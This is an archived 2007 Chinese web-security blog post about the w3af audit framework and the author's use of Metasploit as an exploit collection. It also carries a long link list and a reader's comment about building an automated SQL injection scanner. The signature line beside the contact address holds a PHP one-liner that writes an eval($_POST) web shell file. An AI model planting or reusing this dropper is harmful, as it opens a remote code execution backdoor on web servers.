-
2007-10-21
Web Application Attack and Audit Framework
版权声明:转载时请以超链接形式标明文章原始出处和作者信息及本声明
http://superhei.blogbus.com/logs/10399125.html
Web Application Attack and Audit Framework
昨天看到fd上发布了一个Web Application Attack and Audit Framework--w3af :http://w3af.sourceforge.net/ 看上去很不错,不过现在好象不支持windows.以前我一直想开发一个属于自己的web app attack framework,但是直接的程序水平和时间有限啊,一直没有搞,而是直接使用了Metasploit,由于自己会点perl所以采用了Metasploit2.7做exp集合[不过也是好久没加新东西进去了:)] :
随机文章:
wmiexec.asp[原创] 2006-10-05两会 2006-03-18又是被动过滤..... 2006-02-26[zz]PHP5 Globals Vulnerability 2006-02-15意识漏洞?? 2006-02-12
收藏到:Del.icio.us
5up3rh3i'blog[提供有偿web代码安全审计服务]
MSN:SuperHei@ph4nt0m.org< ?fputs(fopen('heige.php','w+'),'< ?php @eval($_POST[c])? >');? >
搜索
最新文章
最新评论
链接
- #########
- 舒舒
- 二哥哥
- lanker
- fa1l3n
- axis
- swap
- lvhuana
- spr1t3
- 小沈
- fox
- 随便名字
- GaRY
- 7j
- RAyH4c
- #########
- PST
- HackTic
- 2600
- NGS
- cgisecurity
- owasp
- seclists
- argeniss
- phpsec
- bugtraq
- milw0rm
- phpsecure
- T.H.C
- webappsec
- phpsec'blog
- shiflett.org
- secyou
- Rst
- waraxe
- appsecinc
- northern-monkee
- blog.0x557
- ush
- EST
- securityreason
- infoshackers
- zwell
- spidynamics
- morx
- securitytracker
- modsecurity
- securiteam
- securiteam's blog
- phpclasse
- hardened-php
- csdn
- pro-hack
- f-secure
- rubyforge
- wisec
- redteam-pentesting
- alertpool
- blog.php-security
- timvw
- sqlsec
- sourceforge
- zeroknock
- qasec
- hacksafe
- smartsecurity
- gulftech
- thespanner
- nth-dimension.org.uk
- secweb
- cera.secniche.org
- swan不是牛
- Getahead
- xssed
- kuza55
- myappsecurity
- xssworm
- playhack
- hackademix
- manicode
- switch
- planet-websecurity
- disenchant.ch
- hackathology
- blueinfy
- bindshell
- net-square
- yaisb
- sirdarckcat
- googleonlinesecurity
- ########
- darkc0de
- darknet
- insecuremag
- serversniff
- tbs_pocket_knife
- seeknot
- php手册
- frsirt-google
- grip
- vuln.watch
- securitytracker.com
- connectionstrings
- oracle sec
- r00tin
- rawlab
- sommarskog
- taossa
- neilcar
- spl0it
- notsosecure.com
- dross
- ie's blog
- bluehat
评论
我想做一套WEB程序的自动漏洞检测系统。
这可是我的一直以来的心愿。
目前针对注入的方向。
目前已经能爬遍网站所有的页面。
把每一个动态URL的参数放到COOKIES里面测试注入(针对ASP)
测试每一个COOKIES变量的安全性。
得到form框架的每一个数值,并进行简单的测试性提交。。(因为如果要智能的话,其中要解决的问题很多,比如规定某个地方必须是某个格式提交的,这个程序现在还没这么智能,我汗。)
下一步,就是对ASP代码的白盒子分析。啊呵呵。。
我不怕没时间,因为我一向都没时间。
我每天看东西学东西玩游戏累了,我就去写一点。
总有一天能完成。
不求什么,只是自己的一个心愿而已,啊呵呵。
所以你也别怕你没时间啊,完全凭借爱好做的事情,就不怕别人说慢,啊呵呵。。